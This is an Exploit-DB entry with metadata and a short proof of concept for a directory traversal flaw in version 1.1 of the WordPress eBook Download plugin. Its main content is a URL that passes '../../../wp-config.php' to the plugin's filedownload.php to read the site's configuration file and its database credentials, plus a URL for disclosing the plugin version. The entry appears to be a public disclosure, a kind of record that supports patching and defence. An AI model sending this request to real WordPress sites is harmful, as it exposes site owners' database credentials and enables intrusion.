WordPress Plugin eBook Download 1.1 - Directory Traversal

Author: Wadeek
type: webapps
platform: php
port: 80.0
date_added: 2016-03-21  
date_updated: 2016-10-10  
verified: 1  
codes:   
tags: WordPress Plugin  
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-03-25-at-95821-am.png  
application_url: http://www.exploit-db.comebook-download.zip  

raw file: 39575.txt  
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7

[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================

[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================